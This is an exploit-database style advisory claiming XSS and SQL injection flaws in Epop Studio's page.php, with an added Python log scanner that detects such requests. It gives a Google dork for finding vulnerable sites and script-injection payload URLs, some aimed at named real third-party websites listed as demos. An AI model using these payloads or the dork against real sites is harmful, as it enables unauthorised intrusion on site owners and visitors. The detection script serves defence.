# Exploit Title: Epop Studio XSS/SQL Injection Vulnerabilities
# Date: 05/10/2012
# Author: The Black Devils
# Software Link: http://epopstudio.com/
# Category : [ webapps ]
# Dork : Site By Epop Studio inurl:page.php?pid=
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http://localhost/[Path]/page.php?PageId='"><script>alert(1337);</script>'
http://localhost/[Path]/page.php?PageId=[sql injection]
-------------------------------
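Added example, not part of the original advisory: a log check a defender could run to find requests to page.php whose page-id parameter carries markup or quote characters like the patterns above. It assumes legitimate ids are integers and that the server writes combined-format access logs; the function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter spellings used in the advisory, compared case-insensitively.
ID_PARAMS = {"pid", "pageid"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Oct/2012:10:00:01 +0000] "GET /page.php?pID=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Oct/2012:10:00:07 +0000] "GET /page.php?pID=%27%22%3E%3Cscript%3Ealert(1337)%3B%3C/script%3E%27 HTTP/1.1" 200 4310',
    '203.0.113.9 - - [05/Oct/2012:10:00:09 +0000] "GET /site/page.php?PageId=7%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [05/Oct/2012:10:00:12 +0000] "GET /index.php?pID=%3Cb%3E HTTP/1.1" 200 900',
]

def classify(value):
    """Return None for a plain numeric id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", value):  # assumption: real page ids are integers
        return None
    if re.search(r"[<>]|script", value, re.I):
        return "markup-in-id"
    if re.search(r"['\"]", value):
        return "quote-in-id"
    return "non-numeric-id"

def scan(lines):
    """Return (line_no, parameter, decoded_value, label) for each suspicious hit."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        try:
            url = urlsplit(match.group(1))
        except ValueError:  # malformed request target; nothing to inspect
            continue
        if not url.path.lower().endswith("/page.php"):
            continue
        # parse_qsl percent-decodes, so encoded payloads are compared in clear form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            label = classify(value) if name.lower() in ID_PARAMS else None
            if label:
                findings.append((line_no, name, value, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```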
# Demo site:
http://www.florencefreedom.com/page.php?pID='"><script>alert(1337);</script>'
http://www.953wiki.com/page.php?pID='"><script>alert(1337);</script>'
http://www.aftonalps.com/page.php?pID='"><script>alert(1337);</script>'
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com